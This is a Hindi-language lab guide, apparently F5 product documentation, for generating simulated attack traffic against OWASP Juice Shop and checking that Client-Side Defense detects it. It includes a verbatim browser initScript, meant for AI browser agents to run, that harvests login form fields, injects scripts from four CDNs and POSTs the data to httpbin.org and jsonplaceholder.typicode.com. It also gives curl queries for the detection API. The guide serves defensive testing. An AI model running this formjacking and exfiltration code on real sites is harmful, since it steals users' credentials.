चरण 2 — आक्रमण

चरण 2 संरक्षित एप्लिकेशन के विरुद्ध अनुकरणीय आक्रमण ट्रैफ़िक उत्पन्न करता है और पुष्टि करता है कि CSD ने इसे डिटेक्ट किया। आगे बढ़ने से पहले चरण 1 पूर्ण होना चाहिए — सभी स्टेप 7 की जाँचें PASS होनी चाहिए।

स्टेप 8: आक्रमण अनुकरण

टिप्पणी

इस स्टेप के लिए ब्राउज़र-साइड JavaScript एक्ज़ीक्यूशन आवश्यक है — curl CSD डिटेक्शन को ट्रिगर नहीं कर सकता। ब्राउज़र ऑटोमेशन उपकरण (MCP Chrome DevTools, Playwright, Puppeteer) वाले AI असिस्टेंट नीचे दिए AI-स्वचालित एक्ज़ीक्यूशन अनुक्रम का उपयोग करके इन स्टेप्स को सीधे निष्पादित करते हैं। ब्राउज़र ऑटोमेशन के बिना ऑपरेटर मैन्युअल स्टेप्स निष्पादित करते हैं।

इन्फ्रास्ट्रक्चर सत्यापित होने के बाद (सभी चरण 1 स्टेप 7 जाँचें PASS), CSD डिटेक्शन उत्पन्न करने के लिए आक्रमण अनुकरण स्क्रिप्ट चलाएँ। स्क्रिप्ट ट्रिगर डिटेक्शन गाइड और आक्रमण स्क्रिप्ट लाइब्रेरी में परिभाषित हैं।

AI-स्वचालित एक्ज़ीक्यूशन

ब्राउज़र ऑटोमेशन उपकरण वाले AI असिस्टेंट आक्रमण अनुकरण को प्रोग्रामेटिक रूप से चलाते हैं:

1. initScript के साथ नेविगेट करें — पहले about:blank पर नेविगेट करें ताकि एक साफ़ डॉक्युमेंट संदर्भ सुनिश्चित हो (पिछले नेविगेशन से stale initScript से बचाव), फिर navigate_page से http://$F5XC_DOMAINNAME/#/login पर एक initScript के साथ नेविगेट करें जो zone.js के पैच करने से पहले native setInterval, clearInterval, fetch, और console.log सहेजता है, लॉगिन फॉर्म फील्ड्स के लिए पोल करता है, native HTMLInputElement.prototype.value setter के माध्यम से क्रेडेंशियल भरता है, और तुरंत Combined Detection Script को inline निष्पादित करता है। नीचे दिए verbatim initScript का उपयोग करें।
2. वेलकम बैनर खारिज करें — Welcome Banner बंद करने के लिए Escape के साथ press_key करें। बाद की विज़िट में बैनर नहीं आ सकता (कुकीज़ persisted हैं)। कुकी सहमति डायलॉग Escape key द्वारा स्वचालित रूप से खारिज हो जाता है।
3. पूर्णता की प्रतीक्षा करें — सभी CDN स्क्रिप्ट load/error कॉलबैक और fetch promise resolutions पूर्ण होने के लिए 10 सेकंड प्रतीक्षा करें।
4. साक्ष्य कैप्चर करें — [CSD Demo] Simulation complete और CDN लोड परिणामों की जाँच के लिए list_console_messages; HTTP स्टेटस कोड (200/201 सफलता के लिए, pending held अनुरोधों के लिए) सत्यापित करने के लिए script और fetch प्रकारों तक फ़िल्टर किए गए list_network_requests।

चरण 2 initScript (verbatim — बिल्कुल इसी तरह उपयोग करें):

// Save native references before zone.js patches them
var _si = window.setInterval.bind(window);
var _ci = window.clearInterval.bind(window);
var _fetch = window.fetch.bind(window);
var _log = window.console.log.bind(window.console);

// Poll for login form fields, fill credentials, run detection script
var _poll = _si(function() {
  var emailEl = document.querySelector('#email');
  var passEl  = document.querySelector('#password');
  if (emailEl && passEl) {
    _ci(_poll);
    // Fill credentials via native setter (bypasses zone.js)
    var nativeSet = Object.getOwnPropertyDescriptor(
      window.HTMLInputElement.prototype, 'value').set;
    nativeSet.call(emailEl, 'test@example.com');
    emailEl.dispatchEvent(new Event('input', { bubbles: true }));
    nativeSet.call(passEl, 'P@ssword123');
    passEl.dispatchEvent(new Event('input', { bubbles: true }));

    // Run Combined Detection Script inline using native fetch for exfil
    (function() {
      _log('==================================================');
      _log('[CSD Demo] Combined Detection Script — Starting');
      _log('==================================================');

      _log('\n[Formjack] Phase 1: Form field harvesting');
      var inputs = document.querySelectorAll('input');
      var harvested = {};
      inputs.forEach(function(input) {
        var name = input.name || input.id || input.type;
        harvested[name] = input.value || '(empty)';
      });
      _log('[Formjack] Harvested ' + Object.keys(harvested).length + ' fields:', harvested);

      _log('\n[Supply Chain] Phase 2: Multi-CDN script injection');
      var cdns = [
        { url: 'https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js', name: 'jsdelivr' },
        { url: 'https://esm.sh/moment@2.30.1', name: 'esm.sh' },
        { url: 'https://unpkg.com/underscore@1.13.7/underscore-min.js', name: 'unpkg' },
        { url: 'https://ga.jspm.io/npm:dayjs@1.11.13/dayjs.min.js', name: 'jspm' }
      ];
      cdns.forEach(function(cdn) {
        var script = document.createElement('script');
        script.src = cdn.url;
        script.onload = function() { _log('[Supply Chain] Loaded from ' + cdn.name + ': ' + cdn.url); };
        script.onerror = function() { _log('[Supply Chain] Blocked/failed from ' + cdn.name + ': ' + cdn.url); };
        document.head.appendChild(script);
        _log('[Supply Chain] Injected script tag: ' + cdn.name);
      });

      _log('\n[Exfil] Phase 3: Data exfiltration');
      var payload = JSON.stringify({
        type: 'combined_demo', credentials: harvested,
        page: window.location.href, timestamp: Date.now()
      });
      _fetch('https://www.httpbin.org/post', { method: 'POST', mode: 'no-cors', body: payload })
        .then(function() { _log('[Exfil] Data sent to www.httpbin.org'); });
      _fetch('https://jsonplaceholder.typicode.com/posts', {
        method: 'POST', mode: 'no-cors',
        headers: { 'Content-Type': 'application/json' }, body: payload
      }).then(function() { _log('[Exfil] Data sent to jsonplaceholder.typicode.com'); });

      _log('\n==================================================');
      _log('[CSD Demo] Simulation complete');
      _log('[CSD Demo] Fields harvested: ' + Object.keys(harvested).length);
      _log('[CSD Demo] Scripts injected: 4 (4 CDN domains)');
      _log('[CSD Demo] Exfil channels: 2 (fetch POST)');
      _log('==================================================');
    })();
  }
}, 300);

सावधानी

zone.js असंगतता — Juice Shop Angular के zone.js का उपयोग करता है, जो setTimeout, setInterval, fetch, XMLHttpRequest, और अन्य ब्राउज़र APIs को पैच करता है। यह MCP evaluate_script, fill, और click उपकरणों को Cannot read properties of undefined (reading 'call') के साथ तोड़ देता है। इसके बजाय initScript के साथ navigate_page का उपयोग करें — initScript zone.js लोड होने से पहले चलता है, इसलिए आप native API रेफरेंस सहेज सकते हैं और उन्हें polling कॉलबैक में उपयोग कर सकते हैं। initScript को फॉर्म फील्ड्स native HTMLInputElement.prototype.value setter (fill नहीं) का उपयोग करके भरना होगा और डिटेक्शन स्क्रिप्ट inline चलानी होगी (setTimeout के माध्यम से नहीं, जिसे zone.js पेज लोड के बाद इंटरसेप्ट कर सकता है)। विवरण के लिए ट्रिगर डिटेक्शन — AI-स्वचालित एक्ज़ीक्यूशन देखें।

टिप्पणी

initScript संचय — initScript पैरामीटर के साथ प्रत्येक navigate_page कॉल स्क्रिप्ट को एक persistent सूची में जोड़ता है जो प्रत्येक बाद के डॉक्युमेंट लोड पर चलती है। stale स्क्रिप्ट से हस्तक्षेप से बचने के लिए, या तो रन के बीच about:blank पर नेविगेट करें या साफ़ ब्राउज़र संदर्भ के लिए isolatedContext के साथ new_page का उपयोग करें।

टिप्पणी

initScript में native fetch सहेजना — initScript zone.js के पैच करने से पहले window.fetch.bind(window) सहेजता है। यह सुनिश्चित करता है कि fetch कॉल zone.js के Cannot read properties of undefined त्रुटियों के बिना सही तरीके से काम करें। वही initScript (native fetch सहेजे हुए) चरण 2 और चरण 3 दोनों के आक्रमण रन के लिए उपयोग किया जाता है — CSD mitigation fetch() कॉल को इंटरसेप्ट नहीं करता, इसलिए native रेफरेंस सहेजना mitigation व्यवहार को प्रभावित नहीं करता।

सावधानी

क्षणिक ऑरिजिन सर्वर 404 — Angular एप्लिकेशन पर पहले नेविगेशन पर, polyfills.js या अन्य ऐप स्क्रिप्ट ऑरिजिन सर्वर से क्षणिक HTTP 404 लौटा सकती हैं। इससे Angular बूटस्ट्रैपिंग विफल हो जाती है, जिसके परिणामस्वरूप कोई लॉगिन फॉर्म नहीं के साथ एक रिक्त पेज आता है। 404 अस्थायी है — बाद के अनुरोध 200 या 304 लौटाते हैं। पुनर्प्राप्ति: about:blank पर नेविगेट करें, 2 सेकंड प्रतीक्षा करें, फिर नेविगेशन पुनः प्रयास करें। यदि समस्या कई पुनः प्रयासों के बाद भी बनी रहती है, लोड बैलेंसर पथ के माध्यम से ऑरिजिन सर्वर स्वास्थ्य जाँचें (curl -s -o /dev/null -w '%{http_code}' http://$F5XC_DOMAINNAME/polyfills.js)।

मैन्युअल एक्ज़ीक्यूशन

ब्राउज़र ऑटोमेशन उपकरण के बिना ऑपरेटर स्टेप्स मैन्युअल रूप से निष्पादित करते हैं:

1. नेविगेट करें संरक्षित एप्लिकेशन लॉगिन पेज पर: http://xF5XC_DOMAINNAMEx/#/login
2. डमी क्रेडेंशियल दर्ज करें — Email फ़ील्ड में test@example.com और Password फ़ील्ड में P@ssword123 टाइप करें (फॉर्म सबमिट न करें)
3. DevTools खोलें — F12 दबाएँ और Console टैब पर स्विच करें
4. Combined Detection Script चलाएँ — ट्रिगर डिटेक्शन — Combined Simulation Script चलाएँ से स्क्रिप्ट कंसोल में पेस्ट करें और Enter दबाएँ
5. कंसोल आउटपुट सत्यापित करें — पुष्टि करें कि [CSD Demo] phased आउटपुट दिखाता है: फील्ड हार्वेस्टिंग, 4 CDN डोमेन से स्क्रिप्ट इंजेक्शन, और 2 endpoints पर डेटा exfiltration

क्या ट्रिगर होता है

सिग्नल	व्यवहार	डिटेक्शन
फॉर्म फील्ड हार्वेस्टिंग	email और password इनपुट वैल्यू पढ़ता है	संवेदनशील फॉर्म फील्ड पढ़ने वाली स्क्रिप्ट — High Risk के रूप में फ्लैग
स्क्रिप्ट इंजेक्शन	cdn.jsdelivr.net, esm.sh, unpkg.com, ga.jspm.io से 4 <script> टैग इंजेक्ट करता है	4 नए third-party स्क्रिप्ट डोमेन तक डिटेक्ट (CDN उपलब्धता अलग-अलग हो सकती है)
डेटा exfiltration	www.httpbin.org और jsonplaceholder.typicode.com को fetch के माध्यम से हार्वेस्ट किया गया डेटा भेजता है	बाहरी डोमेन पर नेटवर्क कॉल

टिप्पणी

CDN उपलब्धता अलग-अलग होती है। सभी 4 CDN स्क्रिप्ट हर रन में लोड नहीं होंगी — ब्राउज़र संसाधन सीमाएँ, नेटवर्क स्थितियाँ, या CDN throttling के कारण कुछ ERR_INSUFFICIENT_RESOURCES या timeout के साथ विफल हो सकती हैं। अनुकरण तब सफल होता है जब कोई भी CDN स्क्रिप्ट लोड हो। CSD इंजेक्शन प्रयास को डिटेक्ट करता है चाहे स्क्रिप्ट सफलतापूर्वक लोड हो या नहीं — <script> टैग निर्माण स्वयं डिटेक्शन सिग्नल है।

गंभीर मामलों में, ERR_INSUFFICIENT_RESOURCES पेज-स्तरीय विफलता तक बढ़ सकती है — पूरा पेज रिक्त हो जाता है, स्क्रीनशॉट timeout होते हैं, और take_snapshot विफल हो जाता है। यह आमतौर पर तब होता है जब उसी ब्राउज़र संदर्भ में कई नेविगेशन के साथ भारी initScript संचित हो जाते हैं। पुनर्प्राप्ति: एक ताज़ा ब्राउज़र संदर्भ बनाने के लिए isolatedContext के साथ new_page का उपयोग करें, फिर about:blank → navigate_page with initScript अनुक्रम से पुनः प्रयास करें। यह व्यक्तिगत CDN स्क्रिप्ट विफलताओं से अलग है, जो अनुकरण सफलता को प्रभावित नहीं करती।

संकेत

आक्रमण अनुकरण चलाने के बाद, डिटेक्शन की प्रतीक्षा के लिए इस deterministic polling loop का उपयोग करें:

1. हर 60 सेकंड में /detected_domains क्वेरी करें
2. यदि DET-3 पास होता है (exfil डोमेन /detected_domains में दिखाई देते हैं), तुरंत स्टेप 9 पर जाएँ
3. यदि 10 क्वेरी (10 मिनट) के बाद भी खाली है, CSD स्थिति (चरण 1 स्टेप 5) और संरक्षित डोमेन पंजीकरण (चरण 1 स्टेप 6) जाँचें — इनमें से एक गलत कॉन्फ़िगर होने की संभावना है
4. यदि 30 क्वेरी (30 मिनट) के बाद भी खाली है, रुकें और ऑपरेटर को रिपोर्ट करें — चरण 3 तक जारी न रखें

अतिरिक्त लक्षित अनुकरण (व्यक्तिगत आक्रमण श्रेणियाँ, अधिकतम डिटेक्शन stress test) के लिए, आक्रमण स्क्रिप्ट लाइब्रेरी देखें।

साक्ष्य

AI असिस्टेंट को निम्नलिखित रिपोर्ट करना चाहिए। AI-स्वचालित एक्ज़ीक्यूशन के लिए, साक्ष्य list_console_messages के माध्यम से प्रोग्रामेटिक रूप से कैप्चर किया जाता है (initScript का polling फ़ंक्शन परिणाम कंसोल में लॉग करता है)। मैन्युअल एक्ज़ीक्यूशन के लिए, ऑपरेटर ब्राउज़र कंसोल आउटपुट पढ़ता है।

जाँच	अपेक्षित	स्थिति
लॉगिन पेज लोड	http://$F5XC_DOMAINNAME/#/login पर 200 OK	PASS / FAIL
कंसोल स्क्रिप्ट निष्पादित	कंसोल आउटपुट में [CSD Demo] Simulation complete	PASS / FAIL
फील्ड हार्वेस्ट	कंसोल आउटपुट में Count > 0	PASS
स्क्रिप्ट इंजेक्ट	कंसोल आउटपुट में 1–4 CDN डोमेन (कुछ resource errors के साथ विफल हो सकते हैं)	यदि कोई CDN डोमेन दिखाई दे तो PASS
Exfil चैनल	कंसोल आउटपुट में 2 fetch POST प्रयास	PASS

संकेत

यदि HTTPS LB सर्टिफिकेट वैध है (CertificateValid), तो आप वैकल्पिक रूप से https://$F5XC_DOMAINNAME/#/login के विरुद्ध भी अनुकरण चला सकते हैं। यह डेमो प्रगति के लिए आवश्यक नहीं है।

स्टेप 9: API के माध्यम से डिटेक्शन सत्यापन

डिटेक्शन की पुष्टि के लिए CSD API endpoints क्वेरी करें। polling loop का उपयोग करें: हर 60 सेकंड में /detected_domains क्वेरी करें; जैसे ही DET-3 पास हो आगे बढ़ें। यदि 10 मिनट के बाद DET-3 पास नहीं होता, CSD कॉन्फ़िगरेशन जाँचें। यदि 30 मिनट के बाद DET-3 पास नहीं होता, रुकें और ऑपरेटर को रिपोर्ट करें। ये endpoints API संदर्भ में दस्तावेज़ीकृत हैं और पिछले स्टेप्स की तरह ही प्रमाणीकरण और namespace का उपयोग करते हैं।

टिप्पणी

Endpoint प्रोसेसिंग क्रम: /detected_domains पहले populated होता है और यह प्राथमिक संकेतक है कि CSD पाइपलाइन काम कर रही है। /scripts और /formFields धीमी backend प्रोसेसिंग शेड्यूल पर populated होते हैं और कई अनुकरण रन के बाद भी 20–30 मिनट तक खाली रह सकते हैं। यदि /detected_domains exfil डोमेन (www.httpbin.org, jsonplaceholder.typicode.com) दिखाता है, अनुकरण को सफलतापूर्वक डिटेक्ट माना जाएँ और आगे बढ़ें — नीचे DET-1 जाँच इसे दर्शाती है।

डिटेक्ट की गई स्क्रिप्ट

पिछले 24 घंटों में डिटेक्ट की गई स्क्रिप्ट के लिए क्वेरी करें:

NOW=$(date +%s)
START=$(( NOW - 86400 ))
curl -s -X POST \
  -H "Authorization: APIToken xF5XC_API_TOKENx" \
  -H "Content-Type: application/json" \
  -d "{\"startTime\": \"$START\", \"endTime\": \"$NOW\"}" \
  "xF5XC_API_URLx/api/shape/csd/namespaces/xF5XC_NAMESPACEx/scripts" \
  | jq '{total: (.scripts | length), scripts: [.scripts[]? | {script_name: .script_name, risk_level: .risk_level}]}'

फ़ील्ड	अपेक्षित	स्थिति
total	> 0 (स्क्रिप्ट डिटेक्ट)	यदि > 0 तो PASS; 0 लेकिन /detected_domains exfil डोमेन दिखाए तो PENDING
स्क्रिप्ट नाम	script_name में CDN डोमेन (cdn.jsdelivr.net, esm.sh, unpkg.com, ga.jspm.io) शामिल	यदि इंजेक्ट किए CDN डोमेन दिखाई दें तो PASS

डिटेक्ट किए गए डोमेन

curl -s \
  -H "Authorization: APIToken xF5XC_API_TOKENx" \
  "xF5XC_API_URLx/api/shape/csd/namespaces/xF5XC_NAMESPACEx/detected_domains" \
  | jq '{total_domains: .domain_summary.totalDomains, domains: [.domains_list[]? | {domain: .domain, category: .category}]}'

फ़ील्ड	अपेक्षित	स्थिति
total_domains	> 0	यदि > 0 तो PASS
डोमेन सूची	CDN और exfil डोमेन शामिल	यदि अपेक्षित डोमेन दिखाई दें तो PASS

फॉर्म फील्ड

NOW=$(date +%s)
START=$(( NOW - 86400 ))
curl -s \
  -H "Authorization: APIToken xF5XC_API_TOKENx" \
  "xF5XC_API_URLx/api/shape/csd/namespaces/xF5XC_NAMESPACEx/formFields?startTime=$START&endTime=$NOW" \
  | jq '{total: .total_size, fields: [.form_fields[]? | {name: .name, sensitivity: .analysis.value, scripts: (.associated_scripts | length), locations: .locations}]}'

फ़ील्ड	अपेक्षित	स्थिति
total	> 0	यदि > 0 तो PASS; 0 लेकिन DET-3 पास हो तो PENDING
name	email, password शामिल	यदि संवेदनशील फील्ड दिखाई दें तो PASS
sensitivity	email/password फील्ड के लिए Sensitive	यदि ML ने सही वर्गीकरण किया तो PASS

टिप्पणी

फॉर्म फील्ड प्रोसेसिंग डोमेन डिटेक्शन से धीमी है। पहली क्वेरी पर /formFields endpoint आंशिक मेटाडेटा वाले फील्ड लौटा सकता है। ML sensitivity वर्गीकरण (Sensitive बनाम Not Sensitive) backend प्रोसेसिंग पूर्ण होने के बाद populated होता है — पहले अनुकरण रन के 20–30 मिनट बाद तक हो सकता है। यदि फील्ड दिखाई देते हैं लेकिन वर्गीकरण नहीं है, बाद में पुनः क्वेरी करें। DET-3 (/detected_domains) प्राथमिक pass मानदंड है।

चरण 2 साक्ष्य सारांश

सभी डिटेक्शन क्वेरी के बाद, अंतिम डिटेक्शन स्थिति प्रस्तुत करें:

Test ID	जाँच	स्थिति
DET-1	स्क्रिप्ट डिटेक्ट (/scripts endpoint)	यदि > 0 तो PASS; खाली लेकिन DET-3 पास हो तो PENDING
DET-2	CDN डोमेन डिटेक्ट	PASS / FAIL
DET-3	Exfil डोमेन डिटेक्ट (/detected_domains)	प्राथमिक संकेतक — यदि www.httpbin.org या jsonplaceholder.typicode.com दिखाई दें तो PASS
DET-4	फॉर्म फील्ड डिटेक्ट (/formFields endpoint)	यदि > 0 तो PASS; खाली लेकिन DET-3 पास हो तो PENDING

टिप्पणी

चरण 3 तक आगे बढ़ने के लिए न्यूनतम pass मानदंड: DET-3 PASS होना चाहिए (/detected_domains में exfil डोमेन दृश्यमान)। DET-1 और DET-4 पहले उपयोग या नई rebuild के बाद PENDING दिखा सकते हैं — यह सामान्य है। यदि 30 मिनट के बाद DET-3 भी FAIL दिखाता है, सत्यापित करें कि CSD सक्षम है (चरण 1 स्टेप 5), संरक्षित डोमेन पंजीकृत है (चरण 1 स्टेप 6), और CSD JS टैग इंजेक्ट हो रहा है (चरण 1 स्टेप 7 JS कॉन्फ़िगरेशन जाँच)।

---

चरण 2 पूर्ण। mitigation नियम लागू करने और डोमेन ब्लॉक सत्यापित करने के लिए चरण 3 — Mitigate पर जाएँ।